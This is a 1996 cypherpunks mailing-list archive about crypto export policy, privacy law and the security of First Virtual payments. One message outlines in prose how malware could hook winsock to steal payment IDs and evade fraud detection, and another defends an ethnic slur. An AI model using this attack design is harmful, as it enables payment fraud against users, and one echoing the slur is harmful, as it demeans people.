Date: Tue, 6 Feb 1996 19:19:18 +0800
To: lmccarth@cs.umass.edu
Subject: Re: Likely application for high-bandwidth proxies (fwd)
In-Reply-To: <199602060324.WAA09394@opine.cs.umass.edu>
Message-ID: <Pine.BSD.3.91.960206065604.5857H-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Feb 1996 lmccarth@cs.umass.edu wrote:

> It would appear that a potentially very popular application for high-
> bandwidth anonymizing proxies has arrived: 
>

	come on Lewis...  where's the sight <sic> address? 

	on a little more serious point; the use of multiple high
    bandwidth proxies is fast becoming essential to screen your
    address from the enquiring target, thereby forcing the Feds to
    use either very extensive sniffers or the power of the subpoena (not 
    much luck if the records disappear nightly...).  The only clinker is 
    the big sites are startig to require registration with legal warnings 
    --next of course is payment and they want a credit card --not a check
    or cybercash --a credit card for open debit. 

		attila
 
> Forwarded message from list-managers-digest:
> > From: Project Genesis <genesis@j51.com>
> > Date: Mon, 05 Feb 1996 02:42:13 -0500
> > Subject: Speaking of spams...
> > 
> > Did I mention that Project Genesis is an organization specializing in
> > religious education?  The message below explains why all of our public lists
> > are moderated. I value privacy and have grave doubts about things like the
> > Exon amendment (which may make Internet providers liable), but I also think
> > that we need to ensure that the Internet not become one big red-light
> > district. Spams like this are a step in the wrong direction. It hit several
> > of our religion-oriented lists.
> > 
> > Ken
> > 
> > >Sender: kristina@free.org          [User Unknown - I told her to go away.]
> > >Subject: LIVE NUDE VIDEOCONFERENCING!
> > >
> > >Hi,
> > >My name is Kristina.  I'm a nude model and I'd
> > >love to take my clothes off and entertain you.
> > >You can watch me live and in color on your 
> > >computer.  We can type back and forth and I'll
> > >be happy to perform your erotic fantasy.  If
> > >this sounds like fun, visit the website and
> > >download the software. The address is
> > >http://www.[I don't plan to help them].com or you can get the
> > >software from the BBS at 815-[ditto].  I'll
> > >turn the camera on in my studio and wait to 
> > >hear from you.  I think you'll like what I have
> > >to show you.  This isn't a movie...you make a
> > >request and I'll probably fulfill it for you.
> > >Look for my picture on the Website.  Hope to 
> > >see you soon!
> > >
> > >Love,
> > >Kristina
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <tunny@inference.com>
Date: Wed, 7 Feb 1996 13:39:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Local news botches RSA story
Message-ID: <3117EED8@inference2.com>
MIME-Version: 1.0
Content-Type: text/plain



 -----BEGIN PGP SIGNED MESSAGE-----

On the local San Fransisco Bay Area news early this morning (I think it
was KRON, the local NBC affiliate -- I'm new around here), there was a
story about RSA Inc. licensing encryption technology to the People's
Republic of China -- about a $200 million deal, if I understood
correctly.  Given that RSA is a local company, care to guess how the
story was presented?  "Local hi-tech company makes inroads in global
market?"  "Restrictive government regulations make life tough for U.S.
software companies?"  No, the lead-in and thrust of the story was
"Export of advanced technology will hamper U.S. spy efforts"!  They had
some heavily edited bits from Jim Bidzos, who at least got to make
mention of the "genie being out of the bottle", and the fact that if
they can't buy it from us, they'll get it from someone else, but the
clueless newsies really butchered this one.  RSA was made out to look
like they were selling out their country to make a buck, over the
protests of the government (in fact, the deal obviously received
government approval).

I don't know the details of the deal (I couldn't find anything on
RSA's web page), but it sounded like the software was (as
expected) export-crippled, though Bidzos made some comment about
it being "upgradable".  Anyone have any more details on this?

I expect the report will air again -- maybe some Bay Area cpunks
can catch it and provide some more feedback.  There may even be an
opportunity to educate the local media, though I don't hold out a
lot of hope...

 - Tunny
______________________________________________________________________
James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
tunny@Inference.com    | <--finger for key  36 07 D9 33 3D 32 53 9C
======================================================================


 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRduUPAmQsmyRPddAQHwDQf+Nj6JGXNe8sltA1kch0koSkc+2Lv3u1X9
ilDFdVWNtHGYZUMG9SgUvBGccZe8aZHzBIlk1N2GgUuhrrEAoXQCXdQGOEpAp4Tw
2/kjw6ZioZSIRNluvOnFh5d7D9lsfghXuVxSv0pDj+XNLE2lOW5PCYQI8e5a+tr0
j0EvUR5uSBW4a3OaEG9yigoVV/9EG2/sdA9QtEw2Au8vgffDll/QyhRJodBl2Q8g
jmN23SetRrS+fppW6FM7ApXhJ8/1UlKw0jIADSgsTJ05HnGi+8ZrIoPJiC5VR9Cp
Oo4hSFWtXxzr1zy1MbU2ltLXHvwiXOr67R9WzliZWlu3w2NX/syO1g==
=0OQ5
 -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 7 Feb 1996 00:17:40 +0800
To: cypherpunks@toad.com
Subject: Re: attila sez
Message-ID: <199602061549.HAA09723@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 PM 2/5/96 -0800, paralax@alpha.c2.org wrote:
>I seek to censor no one.  I prefer to confront racisim whenever and wherever
>I see (read) it.  Mr. May embarassed himself with his denigrating application
>of the word "Jap" to describe the Japanese people after demonstrating a gross
>lack of knowledge and sensitivity about Jews.  

For the terminally clue deprived:  Once again:  Tim's
remarks concerning the holocaust were *irony*, get it *irony*.

And calling japanese japs seems reasonably appropriate when also
calling them mass murdering terrorists.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Wed, 7 Feb 1996 10:18:51 +0800
To: cypherpunks@toad.com
Subject: Re: Is toad.com down?
Message-ID: <199602061256.EAA25246@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:44 AM 2/6/96 -0500, John Young kindly offered:

>Mail is coming in here okay, though at about half the usual 
>volume.
>
>
>However, two other people on netcom have posted messages saying 
>that they have been getting almost nothing for several days.
>
>
>A "who cypherpunks" was just sent to <majordomo@toad.com>  and 
>answered promptly, at 6:40 AM EST. Your name is listed.
>
>
>If you like, do a test post to the list and copy me. I'll let 
>you know if both arrive and the timing.
>
>
>Regards,
>
>
>John
>
>
Thanks for your help John.

MJ Wohler





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 7 Feb 1996 11:37:57 +0800
To: cypherpunks@toad.com
Subject: BLU_ink
Message-ID: <199602061357.IAA12528@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-6-96. FinTim:

   "Secret identities. Two systems to combat potential
   signature fraud in cyberspace."

      On digital signatures by public-key cryptography and by
      a "biometric token" system by PenOp of the UK.


   BLU_ink












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Gebes <vgebes@jp.psi.com>
Date: Tue, 6 Feb 1996 08:36:47 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Sometimes ya just gotta nuke em
In-Reply-To: <Pine.SV4.3.91.960205133946.21142A-100000@larry.infi.net>
Message-ID: <199602060001.JAA14299@jp.psi.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

While avoiding the many political issues in this thread to
which my opinion is of little value,

 > As far as Pax Americana goes, the Japanese just _volunteered_ to_increase_
 > the payments they make to support the American garrison in Japan. The
 > non-Okinawans want us in their country.

this is so far off the mark as to be hilarious.  Public opinion
against US troops in Japan is pretty high.  Don't confuse what
the government does to have any bearing on what people want.
Also realize that US mass media's portrayal of events in Japan
may be quite different than that of Japan's mass media.  I would
expect that this is true elsewhere as well...

Vince Gebes
PSI Japan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Tue, 6 Feb 1996 22:38:42 +0800
To: cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <v01540b00ad3cf6103843@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain



In discussions regarding privacy of personal information, Tim Philp has
advocated a "privacy law" similar to those in Europe.  My response is - why
do we always need a law to protect ourselves?  Nowadays the first solution
always appears to be run to mommy govt and ask for help.  In this case
there is clearly the potential for market based solutions.  The problem now
is that there is almost no market!  If people were truly interested in
privacy, there would be a "privacy credit card" and "privacy health care"
that refused to give out information except upon the approval of the
individual concerned.  Once people become interested in their privacy, I
think these sorts of things will appear.

A place where laws are clearly applicable however is in limiting the amount
and type of info the government can gather.

my 2 cents,

        Clay


---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: simsong@vineyard.net (Simson L. Garfinkel)
Date: Tue, 6 Feb 1996 23:04:54 +0800
To: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Subject: Re: How would an FV attack fail? (was: Re: FV's blatant double standards)
Message-ID: <v02130504ad3d0c0deb0c@[204.17.195.43]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 2/5/96, Roy M. Silvernail wrote:
>
>Could you characterize the failure modes?

Sure thing. Most people on this planet do not read their email through a
TCP/IP stack. They either log onto another program or they use a
proprietary front-end. There are actually many, many different ways that
people send email. That's one of the reasons that FV has been successful
--- you don't need a live TCP/IP connection to the internet to use it.


=============
"Superior technology is no match for superior marketing."
=============
Simson on Tour:

Feb 2 - Feb 5 - Cambridge: Conference on Freely Redistributable Software
Feb 7 - Feb 13 - Baltimore: American Association for the Advancement of
Science.
Feb. 28 - March 1 - Seybold, Boston.
March 23 - NYC. MacFair.
March 27 - March 30: Cambridge. Computers, Freedom and Privacy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: simsong@vineyard.net (Simson L. Garfinkel)
Date: Wed, 7 Feb 1996 09:36:36 +0800
To: Nathaniel Borenstein <jpp@software.net>
Subject: Re: FV's blatant double standards
Message-ID: <v0213050aad3d12746c4b@[204.17.195.43]>
MIME-Version: 1.0
Content-Type: text/plain


>
>Simson's comment almost, but not quite, made this clear:
>
>> Yes, clearly if you are not concerned about missing 50-75% of First
>>Virtual's
>> users, this attack will work just fine.
>
>The "just fine" is incorrect, however, because those 50-75% will not be
>MISSED, they will be attacked incompletely, and they will object to
>false transactions, causing our fraud department to launch an
>investigation.  This attack would get stopped pretty quickly, I believe.
> -- Nathaniel
>--------
Well, Simson is being a little terse and not thinking things through, I
guess, because he is in pain with tendonitis and is trying to get out
INTERNET-HATERS.

=============
"Superior technology is no match for superior marketing."
=============
Simson on Tour:

Feb 2 - Feb 5 - Cambridge: Conference on Freely Redistributable Software
Feb 7 - Feb 13 - Baltimore: American Association for the Advancement of
Science.
Feb. 28 - March 1 - Seybold, Boston.
March 23 - NYC. MacFair.
March 27 - March 30: Cambridge. Computers, Freedom and Privacy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 6 Feb 1996 23:37:20 +0800
To: decius@montag33.residence.gatech.edu
Subject: RE: Why am I wrong?
Message-ID: <960206100646.2021253f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>I am posting this pondering to cypherpunks in hopes that it will be refuted.

OK you is rong.

>	One of the largest problems in the debate over public access to 
>cryptography is the fact that both sides of the issue hold absolute beliefs.
>They are unwilling to compromise, and often seem unwilling 
>to decide on a solution which is anything but a total win for their side.

This is normal when no parent is around.

>	On one side of the debate we find the law enforcement community. 
>This group is totally opposed to the concept of public access to 
>cryptography. 

No, most in law enforcement at the working level have no opinion one way 
or the other. Many I talk to know what it is but few have ever seen 
any more complicated than Lotto tickets. The prevailing attitute (which
I happen to share so am biased) is that >most< criminals are not very
intelligent else they would not be criminals.

>Although they claim this to be false, the reality is that 
>these people think its ok for anyone to keep a secret, as long as no one 
>is keeping secrets from them.

Secrets rarely enter into law enforcement. Determining what the truth is
in the face of conflicting data is more often the case

>As Jim Kallstrom, assistant FBI director, put it, "unless 
>you're a criminal, you have nothing to fear from the government." 

At the same time, we have a massive division in this country (do not know 
about others) in which the aim of most citizens is to avoid any contact
with the government if at all possible since invariably the citizen loses
in the exchange.

>The law is often very wrong, and even our lofty constitutional values 
>do not prevent bad laws. When the law is wrong, the law's enforcer is 
>the criminal.

Dangerous attitude to take. The law is never wrong because it is the law.
The fact that a law exists may be wrong but that has nothing to do with the
law itself, it merely is. The law's enforcer would be derelect in his/her
duty if she/he did *not* enforce the law.

(Now sometimes the *enforcement* is over zealous but that is a human matter.

 That is the definition of natural law, 

>People MUST have the right to dissent. 

Is the great strength of the US.

>People must have the right to oppose bad laws

No must, they do.

>and in many cases people must have the capability to violate bad 
>laws with impunity.

Disagree. There may be times when laws are violated with just csause but 
the violator must do so with the expectation of retribution else the law 
is meaningless.

>As Socrates would say, if people know the what is good and what 
>is bad, they will always choose the good, because the good is what is 
>most desirable.

However Pavlov proved that perceptions may be distorted. What is good
today may be evil tomorrow and a lack of stability leads to insanity.

To me "selective enforcement" is a cop-out.

>That is why law enforcement is very restricted in the Constitution. 

Law enforcement is not restricted by the constitution, law *enactment*
is ("Congress shall make no law...").

>The "compromise" the law enforcement community has 
>suggested, key-escrow, is not a compromise at all, because it makes it 
>impossible for people to keep secrets from the government.

No one needs to agree to the compromise. However I believe that good
crypto with key escrow (provided the escrow holder is trusted) is
compelling for a number of reasons, mainly because it provides a means 
to protect information that has no protection today.

Everyone screams about porn on the net. Personally I find the *concept*
of pornography to be an indication of a social problem that no one is willing
to admit to. Crypto provides a means to shield children from the "adult
conspiracy". Haven't seen any mention of that. Crypto will provide the
essential mechanism for Internet Electronic Commerce as MasterCard/Visa
have announced. If I send my 1040 to the IRS on the net, I *want* the gov
to be able to read it.

Public crypto is necessary for the US government to comply with its own
regulations. It will exist. 

Now there are three basic elements that must be understood as a foundation
for discussion. 
a) we are guarenteed free speech
b) there is no requirement that anyone must be able to understand it
c) we have no right to tell anyone not to listen. 

Look at these three items. Anything that denies one or more of these elements
is wrong. May take a while to realize why but will happen.

One corollary: every citizen is responsible for the effect of exercising
his/her right to free speech. You have the right to shout "fire" in a theater
or to threaten the sax man but may be arrested for it. This is not a 
restriction on free speech since each is narrowly defined specification.

"Libel" also carries very specific  specifications that must be met. Does 
anyone here think that a libel suit is a restriction on free speech ?

At the same time nothing compels speech - "You have the right to remain
silent".

Moving right along, the next question would be "could the government
restrict crypto ?" The answer is essentially no since the government
would have to first define what crypto was e.g. prove that Navajo 
was in fact crypto. The compelling problem is that given any random 
string of bits, I could come up with an algorithm/book code/OTP from 
which *anything* could be extracted.

Want a pedophile .GIF to extract from the Gettysburg Address - no problem.
Want to extract the Communist Manifesto from ITAR - hokay. The fact is
that anything could be shown to be an encryption of almost anything else
since good crypto is indestinguishable from random noise. The corrolry being
that it would be impossible to prove that something *wasn't* crypto.

In fact it would be possible that given an encrypted message, using one key,
a first message would appear, given another, a second. Which is the real
message ? (see the fifth amendment)

Thus it would seem to me to be (not a lawyer or a politician so what do I know
- we used to have an ordinamce near here requiring alligators to be leashed)
very difficult to legislate anything concerning crypro since first crypto
would have to be defined and second it would have to be able to be detected -
a requirement for all text to be in third-grade flat ASCII won't fly.

"A bear's natural habitat is a Studebaker".
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 7 Feb 1996 02:33:46 +0800
To: Nathaniel Borenstein <nit@chron.com
Subject: Re: FV's blatant double standards
Message-ID: <2.2.32.19960206180750.00caaa14@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:34 AM 2/6/96 -0500, Nathaniel Borenstein wrote:

>1.  He doesn't explain how he's going to spot the VirtualPIN in the
>outgoing stream.  Given the non-structured nature of the VirtualPIN,
>this alone probably requires more sophistication than our entire attack
>program.
>
>2.  He acknowledges that this approach will miss anyone who isn't buying
>things from the machine that actually composes his mail messages.  What
>he doesn't seem to realize, however, is that this means that any
>automated attack will cause "fraud" to be called as soon as it hits a
>user of AOL, Compuserve, etc.  Jeff's approach would last a bit longer,
>but is also vulnerable to heterogeneous mail environments.  The real
>point is that an automated attack like this one is undermined by email
>heterogeneity, which will cause FV's fraud department to be alerted
>quite quickly & trace things down.  In contrast, the attack we've
>outlined on credit card numbers is simple, single-step, and has no
>obvious "misfiring path" that would lead to quick detection.  It could
>do its dirty work for a long time.  
>
>
You missed my point.

1) hook into the winsock and look for an FV message in the web data stream,
save the ID.

2) now look for an approve/deny/fraud, when you see one you know that the
user uses an IP connection for mail and web.

3) only now does the attack begin.

The attack does not trigger until it *knows* that both FV orders and
confirms are moving via winsock - I.E. it does not report back the FV ID of
the victim until it sees the victim use FV and *knows* it can intercept the
reply.  The key  here is not breaking all cases just a significant number
and not setting off too many alarms.

This significantly lowers the fraud detection risk, now the fraud does not
get noticed until the card statement shows up, the same as with a card
number snooping attack.

Yes it will miss a large group of FV customers who use AOL, CI$ etc
(although a similar hook in the common serial port code on Win95 could catch
most of them).

The basic point is if the achine is not secure then no data on it is either.


John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Tue, 6 Feb 1996 23:33:55 +0800
To: cypherpunks@toad.com
Subject: Encryption Software
Message-ID: <199602061516.KAA28650@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks,Derek

        My goof. I reread the manual and it is clear now. Why I didn't catch
it the first go round,
I don't know. I guess I'm just blind or stupid. Thanks again for your
help..........BY the way,
does any one know of a "good" file wiping program that I can either download
or buy.
Preferably, military grade.
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 7 Feb 1996 02:40:26 +0800
To: Decius <decius@montag33.residence.gatech.edu>
Subject: Re: Why am I wrong?
Message-ID: <v01530500ad3cb62ed765@[206.138.118.156]>
MIME-Version: 1.0
Content-Type: text/plain


I think there is a middle ground that you may have missed.  Let's see...

The cypherpunk view seems to be that eveyone *should* use forms of
encryption for passing packets along on the internet.  It works best when
the majority of people are using, but no one is forced to encrypt their
email.  People still send postcards, right?  No matter what percentage of
users on the net use encryption, there will always be those who will
exercise their right to send open, plain text messages.  It is our right to
choose *to* encrypt that we are fighting for, not a general mandate that
all use crypt.

As for the law's take on this matter, under the constitution, they have no
right to tell us that we cannot use encryption in sending our messages.
They also have no right to tell us that we cannot teach others how to use
it, develop easier ways to implement it so that eventually it will be a
no-brainer to use, say that we are criminals because we opt for our right
to privacy, or ask us to give up that right to privacy because we are using
a new medium.  One issue that may come up is that the law cannot make us
give our passwords so that they may use our keys to open our documents
because it would be self-incrimination, however, they can serve warrants to
search our software and documents.  In their search, they will be able to
try and break our passwords to gain access to the files.  If they cannot,
it is their tough luck.

I don't think that I am stating a position of cypher-anarchy, but
advocating a position of personal privacy guaranteed by the Fourth
Amendment.  I don't think that wide-spread use of cyptography would cause
anarchy.  Would foreign govt. be able to slpi stuff by our govt. because
they can use encryption?  Sure, like they aren't already doing that right
now.  The US govt. seems to be saying "Hey, no fair!  I can't see your
stuff anymore.  You can't do that!"  when all along, no one has been able
to see their packets because they are encrypting it.

There are still ways for them to gain access too.  Don't tell me they can't
set up peeping toms to record keystrokes.  Certainly they can do this on
ppl's machines.  It would be more difficult, but that is the whole point.
It should be sufficiently difficult for them to tap so that to tap freely
would be infeasable for them to do, just like steaming open every envelope
that comes through would be infeasable.  They can only go after the real
suspects because it is feasable to do only that.

In essence, what I am saying about the govt. is that thy are crying wolf.
They can still be efficient in their duties without wholesale access to all
the data streams.  They want the power to monitor far more traffic than
they could ever get warrants for and they know it.

I likewise invite you to chip at the cracks in my reasoning as it will
improve our arguments in general.  Freedom is power.  God save the Citizen!

Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 7 Feb 1996 02:45:26 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Likely application for high-bandwidth proxies (fwd)
Message-ID: <v01530501ad3cbe08afa0@[206.138.118.156]>
MIME-Version: 1.0
Content-Type: text/plain


>It would appear that a potentially very popular application for high-
>bandwidth anonymizing proxies has arrived:
>
>Forwarded message from list-managers-digest:
>> From: Project Genesis <genesis@j51.com>
>> Date: Mon, 05 Feb 1996 02:42:13 -0500
>> Subject: Speaking of spams...
>>
>> Did I mention that Project Genesis is an organization specializing in
>> religious education?  The message below explains why all of our public lists
>> are moderated. I value privacy and have grave doubts about things like the
>> Exon amendment (which may make Internet providers liable), but I also think
>> that we need to ensure that the Internet not become one big red-light
>> district. Spams like this are a step in the wrong direction. It hit several
>> of our religion-oriented lists.
>>
>> Ken

I don't think that you understand one thing.  If we (the users of the
internet) say that X-THING is unacceptable on the internet, we open up the
floodgates for everything else that ppl what to censor.  There are better
ways to keep children from looking at sites and spams like the one you
posted.  Parents.  It's their responsibility to keep their children from
getting into this stuff on the net.  If we allow the govt. to take care of
our issues and do not take responsibility for them ourselves, we deserve to
have a big brother who can take care of us (see what I mean?)  No control
can be given to the govt.  If it comes down to it, we can have a rating
system like the movies and music.

Our lists are moderated, BTW, so that we don't have to wade through a bunch
of irrelevant data while trying to read about the lists/newsgroups topic.
Some of my favorite groups are alt groups, and as much as I hate having to
read about Grubor all the time (please ship him off to a dessert isle), the
moderation would limit the scope of the groups and interesting, sometimes
relevant pseudotopics would be gone.  I want the psudotopics!  That's where
some of the best threads get started!  But moderated groups have their
place too.  Who wants to read a bunch of trolls while trying to read a
science group.  And soc.support groups would not be of much use if flamers
and lusers kept posting disruptive and disturbing articles.  But in all the
cases here, it is we, the users, who decide what stays and what goes.

Peace to all.
Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 7 Feb 1996 00:20:30 +0800
To: lmccarth@cs.umass.edu
Subject: Re: Likely application for high-bandwidth proxies (fwd)
In-Reply-To: <199602060736.CAA10630@opine.cs.umass.edu>
Message-ID: <Pine.BSD.3.91.960206101448.18146C-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Feb 1996 lmccarth@cs.umass.edu wrote:

> attila writes:
> > 	come on Lewis...  where's the sight <sic> address? 
> 
> Project Genesis <genesis@j51.com> forwarded:
> > > > >http://www.[I don't plan to help them].com 
> 

	just raggin' -what the hell do I need with phony hamburger on the
    screen when I have steak at home?


> I didn't obfuscate the URL; that was done by the person who forwarded the
> message to list-managers (where I saw it). Maybe you can find it with Alta
> Vista. Since they were apparently spamming mailing lists, maybe someone has
> already pulled the plug on them.
>
	plug pulling for spamming --sure; but for the rest, everyone to 
    their own taste (whew, that was bitter....)
 
> -Lewis "Despite all my rage, I am still just a rat in a cage" -Smashing
> P'kins
> 
	they say you have a fixed number of heartbeats in your life time; 
    running in a cage at full hearbeat shortens your life span --but, you'll
    be lean and mean to go!

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Bourque <pierre@dragon.achilles.net>
Date: Tue, 6 Feb 1996 23:51:23 +0800
To: "Simson L. Garfinkel" <simsong@vineyard.net>
Subject: Re: FV's blatant double standards
In-Reply-To: <v0213050aad3d12746c4b@[204.17.195.43]>
Message-ID: <Pine.SUN.3.91.960206102401.7535D-100000@dragon.achilles.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Feb 1996, Simson L. Garfinkel wrote:

> =============
> "Superior technology is no match for superior marketing."
> =============

How true !

Pierre Bourque
Mercenary Scribbler
SurfBoard: here
And on the Left Coast: pierre@well.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Wed, 7 Feb 1996 08:53:00 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: EIA and TIA Paper on Crypto Policy
Message-ID: <Pine.SCO.3.91.960206104615.11830B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


The February 2nd edition of "Washington TELECOM Week" reports that the 
Electronic Industries Association (EIA) and the Telecommunications 
Industry Association (TIA) have jointly submitted to the Whitehouse a 
paper that warns the administration about the folly of continuing the 
"virtual embargo" that is in place for all exports of encryption 
controlled by the State Department.  The paper warns that the nation will 
take a heavy hit if export restrictions are not "significantly eased."  
According to the groups, stringent export controls on encryption software 
and products are a blow to both the economy and national security.

The member companies of the two large groups have concluded that it is 
"no longer in the national interest to use export control policy as a 
tool to impede data security products."

According to the paper, even the new policy leads to a number of 
injurious consequences, including the loss of sales and the loss of 
efficiency.  It emphasizes that there is a growing need for data security 
products containing encryption in the private sector, both in the US and 
overseas.

The export controls, said the paper, "lead to increased risk of 
penetration from hackers, commercial competitors, terrorists and 
others."  Hence, they call for the development of cheap, easy-to-use 
encryption for a wide variety of potential applications, or "the U.S. 
Government and industry both will suffer."

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Wed, 7 Feb 1996 02:15:39 +0800
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: [NOISE] Alien factoring breakthroughs
In-Reply-To: <v01510100ad39743778ee@[193.74.216.13]>
Message-ID: <199602061654.KAA02165@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


Andrew.Spring@ping.be (Andrew Spring) said:

>> The Grays have renegged on their abduction quota agreement, and are
>> abducting many more people than before. Most of these are returned,
>> after being implanted with a device which allows the grays to have
>> total control over their thoughts and actions. Approximately 40% of
>> Americans now carry one of these devices, which are impossible to
>> remove without killing the host.
>> 

AS> The mark of a good conspiracy theory is its untestability.  Your
AS> theory fails here, because you could perform autopsies on those
